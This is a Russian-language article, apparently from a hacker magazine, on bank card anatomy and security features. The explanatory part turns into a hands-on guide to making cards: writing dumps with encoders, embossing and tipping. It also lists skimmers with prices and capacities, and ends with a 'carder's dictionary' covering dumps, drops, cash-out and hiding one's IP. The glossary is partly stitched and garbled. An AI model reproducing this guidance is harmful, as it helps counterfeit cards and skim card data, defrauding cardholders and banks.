Магнитная полоса располагается на реверсе креды, в верхней части, недалеко от верхнего края. Внешне она ничего интересного собой не представляет – черная или коричневая полоса во всю длину карты. Полоса состоит из нескольких магнитных дорожек (чаще всего – 3). Ширина ее составляет от 10,1 до 10,3 мм (если на креде 3 дорожки). Каждая дорожка отвечает за хранение своей собственной информации, при этом на каждой дорожке могут располагаться максимум 107 символов (цифровых или буквенных).
1 дорожка содержит основную инфу: идентификационный номер, общую информацию о владельце, сведения про эмитент, срок действия карты и немного служебной информации.
2 дорожка отвечает за авторизацию карточки (полностью определяет, какие операции и на какую сумму ты можешь производить с кредой), а также дублирует часть инфы с первой дорожки.
3 дорожка используется в основном при работе с банкоматом (иногда ее может и не быть – тогда магнитная полоса будет уже). Первые две дорожки только для чтения, третья – также и для записи (на ней, например, банкомат делает отметки о снятии денег). Для защиты магнитной полосы от подделок существуют специальные проверочные коды CVV (Card Verification Value) для Visa и CVC (Card Verification Code) для Europay, но копированию полосы они противостоять не могут.
Чип
Чип – самый высокотехнологичный элемент креды, и, естественно, этот вид карт стал применяться сравнительно недавно. Можно с уверенностью сказать, что за смарт-картами будущее (вернее, уже и настоящее).
У чиповых карт множество преимуществ перед другими и лишь один недостаток. Первый плюс – надежное хранение информации. А это - один из определяющих факторов в финансовых операциях (деньги ведь никто не хочет терять). Хотя, как ты знаешь, непробиваемой защиты не существует. Потом, если в карточке используется микросхема, то креда может сама принять решение о правомерности выполняемой сделки. К недостаткам можно отнести, разве что, сравнительно высокую стоимость производства карты.
Чиповые карты делятся на карты с памятью и карты с микросхемой.
Больше всего сейчас распространены креды с памятью (это самый простой вариант чиповой карты).
Для хранения инфы используется EEPROM (electrically erasable programmable read-only memory - электрически стираемая программируемая память только для чтения). Для обеспечения безопасности финансовых операций, вся память разделена на несколько зон, каждая из которых защищена отдельно (каждая своим ключом, одна из них - твоим pin-кодом). Считыванием инфы и определением валидности карты занимается терминал.
Карты с микросхемой устроены значительно сложнее, и, соответственно, стоимость их производства намного выше. В кредах применяется 8-разрядный проц, а также имеется постоянная (ROM) и оперативная (RAM) память. Для хранения информации используется все тот же EEPROM. Рабочий софт (некое подобие операционки) прошит жестко и перезаписи не подлежит. Аппаратная криптографическая защита построена обычно на алгоритмах RSA (Rivest-Shamir-Adleman) или DES (Data Encryption Standard) - про них ты наверняка много раз читал в Хакере.
Конечно, никаких элементов питания на карте не предусмотрено, поэтому креда «включается» только тогда, когда на нее терминалом подается рабочее напряжение (через контакты чипа).
Одним из бонусов креды с микросхемой является электронный кошелек. Он реализован аппаратно и представляет собой особый файл в памяти, содержащий сведения о количестве средств на счете. Для доступа к кошельку необходимо знать pin-код. При добавлении или списании средств со счета, соответственно изменяется файл.
Для большинства чиповых кред используется спецификация EMV, разработанная крупнейшими платежными системами: Europay, MasterCard и Visa.
При всем этом, кредитка может выполнять и дополнительные функции. Например - играть роль бесконтактного проездного в метро (кстати, такие креды иногда выдают студентам даже в наших вузах).
В последние время стали продвигаться всевозможные проекты девайсов для бесконтактного использования контактных кред (например, при помощи Bluetooth). Т.е. ты вставляешь кредитку в небольшой переходник и при оплате карточку доставать уже не нужно. Переходник сам обменяется всеми необходимыми данными с электронным терминалом. Так как все данные передаются по радиоканалу, то нет никакой гарантии, что их никто не перехватит. Поэтому весь трафик шифруется (при помощи ключей, которые передаются только на этапе персонализации карточки). Это, конечно, выглядит довольно ненадежно, но что поделаешь – всем хочется удобства.
Щит и меч
Физическая (иногда ее еще называют полиграфической) защита кредитки состоит из нескольких частей. К ней относятся, например: голограмма, полоса для подписи, фотография владельца, скрытые рисунки/надписи и микрошрифт. Давай остановимся на этом поподробнее.
Голограмма. Голограмма производится из нескольких соединенных слоев фольги, нередко на нее еще и эмбоссируется часть текста, что затрудняет попытки изготовить подделку креды. К примеру, на голограмме Визы изображен голубь, который вращает головой и машет крыльями, на МастерКарде – красочный глобус и карта мира. Долгое время точно подделать голограмму не могли, сейчас и это – уже не проблема.
Полоса для подписи. Полоса для подписи расположена на реверсе креды. Фоном полоски служит асимметричный и/или сложный рисунок, она изготовлена из соответствующего материала, препятствующего стиранию и смыванию подписи. Необходимо, чтобы подпись полностью соответствовала подписи на документе, удостоверяющем личность владельца. В некоторых случаях на полосе еще выжигается лазером номер карты.
Фотография владельца. Также расположена на реверсе. Фотка – самый простой способ проверить, являешься ли ты владельцем.
Скрытые рисунки/надписи. Обычно на карточку наносятся специальными красками скрытые рисунки, невидимые невооруженным глазом. Такие рисунки видны либо в ультрафиолете, либо через специальные фильтры.
Микрошрифт. Печать микрошрифтом - еще один вид защиты. Текст, напечатанный микрошрифтом, практически неразличим невооруженным глазом – высота каждой буквы около 1/5 мм. Например, на карточке Visa Electron текст, напечатанный микрошрифтом, находится по периметру логотипов Visa и Electron.
Защита кредиток усложняется по мере их распространения. Производители придумывают все новые виды защиты, и они все постепенно обходятся. С масштабным введением нового вида карт возникает много сложностей, учитывая, сколько миллионов человек сейчас пользуются кредитками (у всех надо кредитки изъять и выдать новые). Сейчас полиграфическая защита переживает определенный кризис, рынок подделок принимает критические размеры, банки терпят от кардерства большие убытки. Единственной надеждой остается переход на смарт-карты с аппаратной реализацией криптографической защиты.
Как нас подделывают
Несмотря на столь серьезную защиту, подделок очень много. Многие фальшивки делаются буквально на коленке, и их качество оставляет желать лучшего, но встречаются и практически неотличимые от настоящих. Кстати, по количеству подделок Россия - признанный лидер.
Самый распространенный и самый качественный вид подделок – так называемый «белый пластик». Используется он так: данные о владельце карты наносятся на девственно чистые креды (болванки). Иногда номера на карточке перебиваются (срезаются/наклеиваются) и такой метод из-за своей популярности даже получил название shave & paste (срезать и наклеить). Понятно, что все подобные действия уголовно наказуемы (срок могут дать немалый).
Как видишь, креда - это не просто пластмассовая пластинка. Кредитки постоянно совершенствуются (уже сейчас креда напоминает миниатюрный компьютер), производители объединяют усилия для борьбы с подделками. Чем все это закончится – посмотрим, но кредитки были, есть и будут.
В 1976 году Americard сменила имя на Visa (для выхода на мировую арену), а в 1980 году MasterCharge – на MasterCard. За несколько лет эти платежные системы стали крупнейшими в мире (в банковской среде) и не собираются сдавать позиции.
На сегодня существуют кредитки только одного стандарта – ID-1, другие просто (пока или уже) не используются. Этот стандарт определяет все до сотой доли миллиметра, каждый элемент креды должен находиться точно на своем месте и в полной мере выполнять возложенную на него функцию.
При производстве особое внимание уделяется безопасности на этапе персонализации карточки (нанесение идентификационных данных владельца и прошивка памяти микросхемы (энкодинг)).
К защитным механизмам креды относятся: голограмма, полоса для подписи, фотография владельца и микрошрифт.
Сделай кредитку своими руками
В отличие от детей, кредитные карты делать гораздо сложнее. Кроме навыков и опыта, нужны и соответствующие девайсы. Основные принципы изготовления черпай из статьи, а остальное уже на практике.
Что нужно для производства карт
Все начинается с исходного материала, собственно, подложки любой карточки. В народе для простоты называется пластиком или картоном. Купить пластик нужного размера с вклеенной магнитной полосой сейчас не проблема. Покупать стоит белый пластик, это позволит сэкономить на краске для принтера.
Чтобы из купленного пластика сделать полноценную карту, тебе придется помучиться со специальным оборудованием. Начинается все, как ты понимаешь, с печати изображений на карте. Для небольших тиражей (до 1000 штук) используется метод сублимационной печати.
Чтобы получить качественное изображение, которое не стыдно продемонстрировать своей девчонке или сокурсникам, тебе понадобится специальный принтер для печати на пластиковых картах. При выборе принтера надо внимательно изучить его характеристики. Принтеры делятся на следующие группы: монохромные и полноцветные, односторонние и двухсторонние (на двухстороннем можно печатать сразу обе стороны за один проход). Большинство принтеров имеют встроенные или опциональные (с возможностью докупить нужный блок) дополнительные функции: ламинатор, энкодер, эмбоссер, типпер, а также устройство для вклеивания голограммы и полосы подписи.
С последней функцией более или менее ясно, расскажу про остальные. Ламинатор требуется для того, чтобы после печати покрыть изображение специальной защитной пленкой, этот несложный процесс называется ламинацией. Энкодер поможет тебе записать дамп на магнитную карту, эмбоссер выдавит инициалы и "секретную" комбинацию цифр прямо на карте, а типпер (не путай с триппером) окрасит эмбоссированные символы.
Технология по шагам
Для изготовления полноценной карты надо реализовать несколько нехитрых операций:
- печать изображений на обеих сторонах карты;
- ламинация;
- эмбоссирование;
- типпинг;
- вклейка голограммы и полосы подписи;
- запись информации на магнитную ленту с помощью типпера.
Советы бывалого
С принтером все просто - главное, чтобы его разрешение было не менее 300dpi, он мог печатать без полей и не отрыгивал карты толщиной 0,75 миллиметра. Если принтер не соответствует хотя бы одному из перечисленных параметров, забудь о его существовании.
Не помешает поинтересоваться стоимостью расходных материалов, так как впоследствии это может вылиться в забавную сумму. Помимо стоимости, необходимо также поинтересоваться доступностью этих материалов, чтобы не летать потом за ними в Африку. Понятно, что noname всегда дешевле, но все же советую приобретать оборудование известных фирм. Лидеры в производстве сублимационных и термотрансферных принтеров - это Eltron и Fargo. Покупать только оригинальные (читай - родные) расходные материалы или нет - дело вкуса, но с родными качество гарантировано.
С эмбоссерами вообще элементарно. Здесь получаемое качество практически одинаково для всех моделей, цена зависит лишь от производительности и бренда. Самый простой - это ручной эмбоссер, не требует электропитания и прост в обращении.
При покупке типпера, так же, как в случае с принтером, уточни стоимость и доступность фольги именно для этой модели. А отдельный ламинатор вообще не нужен, проще купить принтер или эмбоссер со встроенным ламинатором. Отдельно ламинатор обойдется дороже, а времени на изготовление одной карты уйдет больше.
Энкодеры умеют записывать два вида карт - high и low coercivity. По сути, это высокая и низкая намагниченность. Имеет смысл купить энкодер, понимающий любые карты. И отдельное замечание по поводу траков - не гонись за энкодером, который записывает все три трака (магнитная полоса имеет три области, называемые траками). Третий трак не читается практически ни одним ПОС-терминалом и уж тем более банкоматами. Так стоит ли переплачивать за бесполезную навороченность? Такой энкодер может понадобиться лишь для выпуска кредитных карт, дающих владельцам определенные скидки.
TA-32 (скимер)
Цена: 1200 зеленых
Память: 512 Кб (около 3000 дампов)
Траки: считывает 1, 2, 3
Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
Подключение: USB
Размеры: 8,25х2,03x2,67 см
Все: 49 граммов
Характеристики
Описание: этот ридер отличается хорошей работоспособностью, позволяет на лету считывать карты любой толщины и с любой плотностью записи. Позволяет считывать в обе стороны и с любой скорость. Термоустойчив, работает при температуре от 0 до 60 градусов. В комплекте идет программное обеспечение. Корпус сделан из суперпрочного пластика ABS, специально для тех, у кого трясутся руки.
PMR-202 (скимер)
Цена: 1190 зеленых
Память: 128 Кб (около 1000 дампов)
Траки: считывает 1, 2
Питание: встроенная литиевая батарея, 50 часов беспрерывной работы
Подключение: USB
Размеры: 4,6х3x3,08 см
Вес: 54 грамма
Характеристики
Описание: из фишек этого скимера можно отметить автоматическое отключение питания при долгом простое, защиту от нежелательных пользователей (защита паролем от несанкционированного доступа). В комплекте идет ПО для работы со скимером.
AMC-772 (энкодер)
Цена: 1000 зеленых
Траки: записывает и считывает 1, 2
Подключение: USB
Вес: 1,33 кг
Характеристики
Описание: один их самых надежных, а следовательно, популярных энкодеров. Подключается к USB, что актуально в последнее время. Жизнеспособность магнитной головки составляет около миллиона проводок, тебе этого хватит и еще останется детям. В наборе идет стандартное ПО.
Matica Z1 (эмбоссер)
Цена: 4700 зеленых
Размеры: 43х40x17 см
Вес: 17 кг
Характеристики
Описание: идеальное решение, проверенное временем. Компактность, приятный дизайн, небольшие размеры и тихая работа. Z1 имеет автоматическую загрузку карт (на выходе готовые карты помещаются в выходной лоток для максимальной экономии пространства), внутреннюю систему диагностики и ЖК-дисплей, обеспечивающий непрерывный контроль работы. Рекомендуемая производительность: 300-500 карт в день. Совместим с окошками, подключение через USB.
Matica Z Tipper (типпер)
Цена: 1990 зеленых
Размеры: 25х25x20 см
Вес: 3 кг
Характеристики
Описание: Matica Z типпер - одиночное устройство для окрашивания эмбоссированных карт (точнее выдавленных символов на них). Чрезвычайно компактные размеры позволяют установить девайс в любое место. Очень прост в работе, задается необходимая температура и прижим для получения идеального результата. Жидкокристаллический дисплей, которым оснащен этот типпер, показывает текущее состояние машины и температуру. Кроме того, функция энергосбережения приводит к пониженному потреблению энергии при простое машины в режиме ожидания. Лента для окрашивания может быть различного цвета. Установка и замена картриджа для загрузки ленты производится элементарно. Скорость окрашивания составляет всего несколько секунд на одну карту!
Eltron P210i (принтер)
Цена: 2195 зеленых
Размеры: 12,5x17x24 см
Все: 3 кг
Характеристики
Описание: Eltron P210i может использоваться для печати удостоверений, предпечатных карт в цвете или монохромно. Годится для односторонней печати без полей. Штампует великолепного качества карты с разрешением 300 dpi, позволяет наносить штрихкоды, фотографии, графику или текст. Тихий в работе, маленький и легкий. Есть модификация с кодировщиком магнитной полосы. P210i поставляется с двойным интерфейсом для простоты интеграции в любой системе: USB и Parallel, либо USB и Serial.
Словарь кардера!
Авторизация - проверка и определение полномочий на выполнение некоторых действий. Разрешение, предоставляемое эмитентом для проведения операции с использованием банковской карты. В процессе авторизации данные о карточке и о запрашиваемой сумме передаются в банк-эмитент, где проверяется состояние счета клиента.
Аккаунт (акк, account) - счет.
AmericanExpress (AmEx) - международная платежная система, номер карты начинается с 34 или 37 и состоит из 15 цифр.
ATM - Банкомат - устойчивое к взлому банковское защитное средство, предназначенное для: выдачи и приема наличных денежных средств; составления документов по операциям с использованием банковских карт; выдачи информации по счету; осуществления безналичных платежей и т.д. Банкомат оснащен процессором, дисплеем, клавиатурой и ридером, предназначенным для считывания информации с карточки.
BIN - первые 6 цифр номера банковской карты, которые определяют выдавший карту банк и ее тип (классик, голд и т.д.).
Card number - номер карточки - уникальный набор цифр, наносимый на карточку в результате эмбоссирования, а также записываемый в память на магнитную полосу или в микросхему.
Card owner - владелец карточки - организация-эмитент банковской карточки.
CVV (Card verifikation value) - проверочное значение для номера карты, находится в дампе.
CVV2 - код дополнительной безопасности, находится на задней стороне кары, обычно состоит из 3 цифр.
DL (driver license) - водительские права (англ.).
Expiration date (exp. date) - срок годности карты, есть на самой карте и в дампе.
VISA - международная платежная система, номера карт начинаются с 4. Сайт.
Вестерн Юнион (Western Union) - международная система денежных переводов.
Ваер (Wire transfer) - банковский перевод.
Gold credit card - золотая кредитная карточка - престижная платежная карточка, предоставляющая держателю приоритетный статус, высокий лимит кредитования, автоматическое страхование и другие привилегии.
Дебетовая (дебитная) карта - карта, пользоваться которой можно только в пределе имеющейся на счету суммы.
Дроп - человек, который берет на себя (осознанно или неосознанно) грязную часть работы. Принимает денежные переводы, предоставляет счет для проведения операций другими людьми и т.д.
Кардер - человек, использующий информацию с чужой банковской карточки для получения денег.
Кардинг - получение денег, благодаря использованию информации с чужой банковской карточки.
Картхолдер - держатель банковской карты, физическое или юридическое лицо.
Кидала (Ripper) - человек, кинувший кого-то из кардеров.
Кредитная карта - карта, на которую можно покупать в кредит, т.е. не имея на счете достаточно денег. Размер кредита определяет банк-эмитент.
MasterCard - международная платежная система, номера катр начинаются с 5.
MoneyGramm - система быстрых денежных переводов.
Мыло - E-mail, адрес электронной почты.
Обнал - превращение виртуальных денег в реальные.
PAN - номер банковской карты, чаще всего 16-и значный.
Платежная система - ассоциация банков и компаний, работающих по общим правилам использования карточек. Основу платежной системы составляет совокупность нормативных, договорных, финансовых и информационно-технических средств, а также решений участников, которые регламентируют свои взаимоотношения относительно порядка использования карточек. В платежной системе существуют несколько статусов членства: полное, частичное и т.д. Все карточки, которые принадлежат к одной платежной системе имеют признаки, позволяющие идентифицировать их принадлежность к этой платежной системе.
Prepaid card - карта с предварительно оплаченной суммой - смарт-карта, в которой хранятся электронные деньги, заранее оплаченные владельцем карты.
Скан - просканированый документ, фотография, банковская карта и т.д.
Транзакция - банковская операция, состоящая в переводе денежных средств с одного счета на другой.
Юзать - использовать.
Реальный кардинг.
Банк-эмитент - банк, выдавший банковскую карту.
Corporate card - корпоративная карточка - банковская карточка, которая позволяет ее держателю проводить операции по счету юридического лица. Ответственность перед банком по этому счету несет юридическое лицо.
Valid date - дата действия - число, впечатанное на банковской карточке, начиная с которого карта становится действительной.
Голограмма - голографическая наклейка наносимая впрессовыванием под большой температурой в карточку. Голограмма служит дополнительной степенью защиты от поделок и является обязательным атрибутом банковских карточек.
Дамп (Dump) - информация с магнитной полосы банковской карты. ??спользуется для записи на пластик определенного стандарта для дальнейшего использования в магазине. см. подробнее: здесь.
Electronic Purse - смарт-карта, в которой хранится цифровая наличность. Такая карта позволяет расходовать электронную наличность, создает запись о каждом платеже и позволяет перевести в цифровую наличность деньги с банковского счета.
Ламинатор - устройство для покрытия банковских карт защитной пленкой. см. подробнее: здесь
PIN-kod - код, используемый для авторизации, при помощи которого можно осуществлять операции с банковской карточкой, например: снимать наличные.
Пластик - чаще всего реальные или поддельные пластиковые банковские карточки, также любой пластик, на который можно записать дамп. см. подробнее: здесь, или:здесь.
Пластиковая карточка - пластина стандартных размеров 85.6 х 53.9 х 0.76 мм, изготовленная из устойчивой к механическим и термическим воздействиям пластмассы, является носителем информации.
POS-терминал - электронное устройство, позволяющее считывать информацию с магнитной полосы или чипа карточки и осуществлять связь с банком для проведения авторизации с целью осуществления операции по банковской карточке.
Реальный кардинг - использование информации с чужой банковской карты в реальных магазинах. Как правило для этого используют дампы, записанные на пластик.
Ридер - устройство для чтения магнитной полосы банковской карты. см. подробнее: здесь.
Смарт-карта - банковская карта с чипом, кредитная карточка со встроенным микропроцессором, обладающая высоким уровнем защиты и возможностью проводить многовалютные расчеты. см. подробнее: здесь
Слип - чек, который выдает POS-терминал.
Shopping - поход по магазинам.
Типпер - прибор для окрашивания эмбоссированных символов. см. подробнее: здесь.
Транзакция - совокупность операций взаимодействия держателя карточки с процессинговым центром при осуществлении платежа по карточке или при получении наличности.
Транзакция изменяет состояние карточного счета держателя карточки.
Трек - одна из дорожек на магнитной полосе банковской карты в виде текстового файла, всего их 3.
Эмбоссер - устройство для выдавливания символов (например номера карты) на пластике. см. подробнее: здесь
Энкодер - устройство для записи на карточки с магнитной полосой (пластик) и чтения их. см. подробнее: здесь
Итернет-кардинг.
Адалт (адульт) - порно-сайт
BidPay - платежная система, которая позволяет человеку, купившему что-либо на аукционе, заплатить за его покупку. Это платежная система, которая позволяет безо всяких проблем сделать MO при помощи карты.
Billing - платежная система.
еБей (еБай) - название интернет аукциона eBay.
Bitcoin - криптовалюта.
Интернет-кардинг - использование данных с чужой банковской карты для осуществления всевозможных операций в интернете, с целью получения денег.
Карта (картон, картофель, КК, СС) - номер банковской карточки. ??спользуется для покупок в интернете. Бывает с кодом cvv2 и без.
Мерчант - торговый счет, на который поступают деньги за проданный товар, система торговли он-лайн.
Палка - система денежных переводов PayPal.
Порник - порно-сайт.
Прокси - функция сервера, которая позволяет пользователю работать от его имени.
SalesCart - пакет электронной коммерции, интегрированный с Microsoft FrontPage, предоставлющий возможность осуществлять покупки в Сети.
Сокс (Sоcks-proxy) - сервер посредник между вашим компьютером и конечным сайтом, используется чтобы скрыть IP.
Спам - масштабная рассылка писем по электронной почте.
SSN (social security number) - номер, который дается каждому жителю США для удобней его налогообложения и отслеживания кредитной истории.
Чарджбек - отзыв банком (кардхолдером) платежа, в отношении которого есть сомнения.
Энролл - связь кредитной карты (счета) с он-лайном с возможностью узнавать и менять данные через интернет.
IP - интернет адрес, состоит из четырех чисел, разделенных точкой, каждое из которых может быть от 0 до 255. Определяет местонахождение пользователя.
WebMoney - платежная интернет-система.
Распространенные сокращения.
Акк, Acc - аккаунт.
АмЕх - American Express.
CC - Карта.
CC-номер - Номер кредитной карты (cc - аббревиатура: credit card)
CVV - Card Verification Value. – определенный номер для проверки подлинности карты. С появлением электронных терминалов мошенники сосредоточились на подделке или изменении информации, хранящейся на магнитной полосе. Для борьбы с такими нарушениями специалисты VISA разработали CVV
Dl - driver licenze.
Exp. date - Expiration date.
КК - карта.
MG - Money Gramm.
MO - Money Order.
SSN - Social security number.
WM - WebMoney.
WU - Western Union.
ABA Routing Number – уникальное девятизначное число, обычно ставится в нижней части чека перед номером счета (обрамленное двоеточиями). Позволяет однозначно определить банк, где находится сумма, на которую выписан чек.
Acquirer (Acquiring Bank) – банк или финансовая организация, осуществляющая весь спектр операций по взаимодействию с точками обслуживания банковских карт, которая состоит из терминалов в торгово-сервисной сети и банкоматов. При получении данных о произведенных операциях в сети, эквайрер направляет их в систему для проведения соответствующих расчетов. Эквайрер отвечает за возмещение средств торговым точкам, в которых производились покупки или оплачивались услуги с помощью карт.
Address Verification Service (AVS) – операция проверки адреса, куда поступает счет за приобретенный товар.
Approval - подтверждение, код, посылаемый банком-эмитентом в подтверждение того, что пластиковая карта покупателя существует, пригодна к пользованию и запрашиваемая сумма находится в пределах допустимого лимита. Подтверждение запрашивается в процессе операции авторизации.
Automated Teller Machine (ATM) – устройство, предназначенное для получения наличных по пластиковой/smart-карте.
Authorization – авторизация, требование оплаты. Процесс авторизации блокирует деньги на счету, уменьшая свободную для расходования сумму. Чтобы осуществить снятие денежных средств, необходимо завершить процесс авторизации. Если за время, которое определяется эмитентом, процесс авторизация не завершается, она отменяется и ранее заблокированная сумма освобождается для расходования.
Authorization Code - код авторизации. Код, состоящий из букв и цифр, посылаемый банком-эмитентом (Сard Issuer), подтверждающий авторизацию. Код авторизации обязательно включается в чек (Sales Draft), выписываемый продавцом.
Bank Identification Number (BIN) - цифры на пластиковой карте, однозначно определяющие банк-эмитент (Issuing Bank). Обычно это первые шесть цифр, которые часто называют бином.
Batch - набор транзакций, сохраняемый для одновременной оплаты, которая происходит обычно раз в день. Batch можно завершить как автоматически, так и с помощью POS-терминала.
Batch Processing - тип обработки данных, при котором определенная совокупность транзакций обрабатывается единовременно.
Billing Address – фактически адрес, на который поступает счет за приобретенный товар.
Capture - решение, о представлении определенной транзакции к оплате. Все транзакции, представленные к оплате, включаются в Batch и направляются процессору платежей или платежному шлюзу.
Сard Issuer – организация, ответственная за выпуск и обслуживание пластиковых карт.
Card-Not-Present – ситуация, когда продавец не имеет возможности видеть покупателя, и ему физически недоступна пластиковая карта, то есть он не имеет возможности считать информацию с магнитной полосы, проверить подпись, посмотреть голограмму и т.п. Чтобы повысить надежность оплаты в этом случае используется система Address Verification Service.
Card Unblocking - операция обратная блокированию (Card Blocking).
Certification Authority - организация, которой доверено выдавать сертификаты открытых ключей.
Chargeback – операция возврата платежа. Сумма, которую вычитают со счета продавца по требованию владельца пластиковой карты. Если признана правота владельца карты, у продавца со счета вычитают сумму платежа плюс комиссию за ChargeBack (Chargeback Fee). Операция ChargeBack инициируется эмитентом после того как эквайрер завершил транзакцию.
Сhargeback Reason Code – двузначное число, которым кодируется причина возврата платежа.
Check Guarantee - способ, гарантирующий оплату по чеку в пределах суммы, установленной для конкретного счета.
Chip Сard – смарт-карта (также IC – integrated circuit card). Пластиковая карта, внутри которой находится микропроцессор, способный хранить «электронные деньги».
Сlose Batch - передача транзакций с кодами авторизации процессору платежей с целью перевода денег на счет продавца.
Commerce Server – Интернет-сервер, подключенный к процессору платежей, имеющий все необходимое для их принятия: программное обеспечение, хранящее информацию обо всех покупках и общую сумму цен, базу данных и т.д. Commerce Server обычно позволяет установить соединение по одному из защищенных протоколов, например, SSL.
Confirmation Letter – электронное письмо, посылаемое продавцу процессором платежей и содержащее сведения о представленных процессору Batch-файлах.
Credit Card - пластиковая карта, показывающая, что ее владельцу открыт кредит в организации-эмитенте. Это позволяет владельцу совершать покупки или получать деньги в банкомате в пределах установленного договором между держателем и эмитентом максимального лимита.
Credit Card Processors (Third Party Processors) - организация, обычно нанимаемая банком-эквайером , для предоставления услуг по процессингу платежей.
CVV2/CVC2 - это контрольный номер, состоящий из трех цифр, который напечатан на обратной стороне банковской карты. Данный номер отображается в верхнем правом углу специальной полсы для подписи. Ввод номера помогает убедиться, что карта используется настоящим владельцем. CVV2 классификация используется для карт VISA. CVC2 классификация используется для карт MasterCard.
Debit Card – дебетовая банковская карта. В отличие от кредитной карты, суммы, потраченные покупателем, автоматически вычитаются с его счета. Для оплаты дебитной картой обычно требуется PIN
Decline – операция отказа эмитента в авторизации платежа.
Demand Deposit Account (DDA) – стандартный счет (checking account), куда могут быть переведены денежные средства.
Deposit - момент, когда продавец формирует (закрывает) Batch-файл и посылает транзакции для завершения.
Deposit Bank - банк, куда посылаются денежные средства продавца, снятые с карточных счетов покупателей.
Digital Signature - цифровая подпись. Последовательность символов, получаемая методами несимметричной криптографии (Public Key Cryptography), присоединяемая к сообщению и подтверждающая его аутентичность.
Digital Wallet -цифровой бумажник. Программа для оплаты товара по пластиковой карте. Перед тем как купить что-то, покупатель регистрируется в платежном шлюзе, получает имя и пароль, после чего может совершать покупку на любом web-сайте, поддерживающем данный тип цифрового бумажника.
Discount Rate - процент, взимаемый банком-эквайером c продавца за каждую покупку.
E-Commerce - электронная коммерция, определенный род деятельности, осуществляемый с использованием электронных средств связи.
Electronic Data Interchange (EDI) - глобальная компьютерная сеть, отделенная от Интернета, используемая банками и другими финансовыми организациями для проведения платежей.
Electronic Data Capture - использование POS-терминала для авторизации и передачи транзакций процессору банковских карт или иному MAP. Роль POS-терминала может играть специальная программное обеспечение или платежный шлюз (Payment Gateway).
Electronic Cash Register (ECR)- электронный кассовый аппарат, другими словами, комбинация кассового аппарата и POS-терминала. Часто ECR - это программное приложение, установленное на персональном компьютере
Electronic Draft Capture (EDC) - система, в которой транзакции передаются из разных мест на центральный компьютер (Host Computer ) для хранения и обработки. Накопленные за период транзакции затем передаются процессору платежей.
Electronic Money (e-money) - цифровая наличность. Хранится в электронном виде в компьютерах или микропроцессорах. Находится в распоряжении покупателя. Цифровая наличность может быть куплена и сохраняться в специальном накопительном устройстве.
Electronic Purse – smart-карта, на которой хранится цифровая наличность (e-money).
EMV-specification – единые международные требования к микропроцессорным карточкам, описывающие требования к карточке, терминалу и процессу обмена информацией между карточкой и терминалом.
Factoring - ситуация, когда собственный номер идентификации предприятия торговли/услуг в платежной
системе (Merchant Account) используется для приема платежей за дополнительную комиссию для нужд другого продавца. Данная деятельность считается нелегальной.
Floor Limit - если цена товара ниже Floor Limit, продавец может обойтись без авторизации (убедившись, что карта не помещена в список потерянных или украденных). Floor Limit обычно устанавливается эмитентом.
Front-End – информация, которую видит покупатель на web-сайте продавца. Front-End позволяет покупателю взаимодействовать с электронной корзиной, базой данных, а также оплачивать покупки.
Holdback (Reserve Account) - часть средств, полученных продавцом от карточных платежей, блокируемая эквайрером или другим MAP, чтобы покрыть расходы на chargeback и другие спорные выплаты. По истечении определенного срока Holdback возвращается продавцу.
Host Capture - автоматическое составление Batch-файла в процессоре платежей или платежном шлюзе.
Host Computer -компьютер, осуществляющий авторизацию и завершение.
Imprint - считывание параметров карты. Может быть электронным (через POS-терминал) или ручным (получение оттиска карты с помощью импринтера). Imprint необходим для доказательства физического присутствия карты в месте покупки.
Interchange - поток информации между эмитентом и эквайрером, например, транзакции, возврат и т.д.
Interchange Fee – комиссия, которую платит банк-эквайрер банку-эмитенту за каждую операцию перевода с банковской карты. Данная комиссия является частью Discount Fee.
ISO (Independent Service Organization) – организация, помогающая продавцу принимать платежи по пластиковым картам. Прежде чем работать с ISO продавцы должны, как правило, уже иметь открытый Merchant Account.
Issuer (Issuing Bank) -эмитент, банк, выпускающий банковские карты и открывающий карточные счета для физических и юридических лиц.
Key - ключ, набор цифр, используемый в криптографическом алгоритме.
Key length - длина ключа (Key), измеряемая в битах.
Limited-purpose prepaid card - смарт-карта, которую можно использовать только в строго определенных точках продаж товаров или услуг.
Load – операция по загрузке цифровой наличности в цифровой кошелек.
Load Log – запись о последней загрузке цифровой наличности в цифровой кошелек.
Local Review – способность продавца видеть со своего терминала или ECR содержимое Batch-файла до или после завершения транзакции.
Locking (Card Blocking) - блокирование smart-карты, предотвращающее ее дальнейшее использование.
Magnetic Stripe – магнитная полоса. Располагается с обратной стороны пластиковой карты и содержит в закодированном виде информацию о карточном счете, связанном с данной картой.
Manual Entry (Keyed Entry) – операция ручного ввода параметров карты с клавиатуры компьютера или POS-терминала.
Member - финансовое учреждение - член ассоциации международной платежной системы.
Merchant – юридическое лицо, принимающее платежи по пластиковым картам.
Merchant Account - уникальный номера идентификации предприятия торговли/услуг в платежной системе, который позволяет принимать платежи по банковским картам. Регистрируя Marchant Account, банк соглашается оплачивать предприятию торговли/услуг правильно совершенные сделки (покупки) в обмен на снятие средств со счетов покупателей в банках-эмитентах.
Merchant Account Provider (MAP) - организация, открывающая Merchant Account.
Merchant Agreement - письменное соглашение между продавцом и банком (возможно, между продавцом, банком и ISO), устанавливающее права, обязанности и гарантии сторон в процессе приема карточных платежей.
Merchant Bank -банк, в котором открыт Merchant Account.
Merchant Category Code - код, который банк-эквайрер присваивает продавцу. Данный код, обычно состоящий из четырех цифр и называемый иногда Sic Code, отражает основное направление деятельности продавца.
Micropayment – микроплатеж, очень маленькая сумма, возможно, меньше цента.
MID (Merchant Identification Number) – число, однозначно определяющее продавца в платежной системе.
Monthly Minimum – минимальная месячная плата, которую удерживают с продавца за прием платежей по пластиковым картам.
MOTO Discount Rate (Mail Order / Telephone Order) - комиссия, которая удерживается эквайрером с каждой транзакции в случае, когда продавец не имеет доступа к самой карте, зная лишь ее параметры, сообщаемые ему по телефону, факсу или Интернету.
Non-Qualified – обозначение транзакции, характеризующейся повышенным риском (например, в с случае, когда транзакция осуществляется с помощью передачи параметров банковской карты при физической невозможности доступа к ней).
Off-line – обозначение состояния системы, когда между участниками платежной системы нет непосредственной связи.
On-line – обозначение состояния системы, когда перед выполнением транзакции идет соединение с центральным компьютером для авторизации в режиме реального времени.
Open To Buy - размер кредита, доступного в данный момент владельцу карточного счета
Payment Gateway – платежный шлюз. Обычно Интернет-сервер с установленным на нем программным обеспечением, вязывающим web-сервер продавца с процессором платежей.
Payment System - платежная система. Набор банковских процедур и систем межбанковского перевода денежных средств.
Pc Pos Application – компьютерная программное приложение, которая объединяет любые две функции из списка: кассовый аппарат, учет ценностей, бухгалтерская программа, программа для авторизации и приема платежей по кредитным картам.
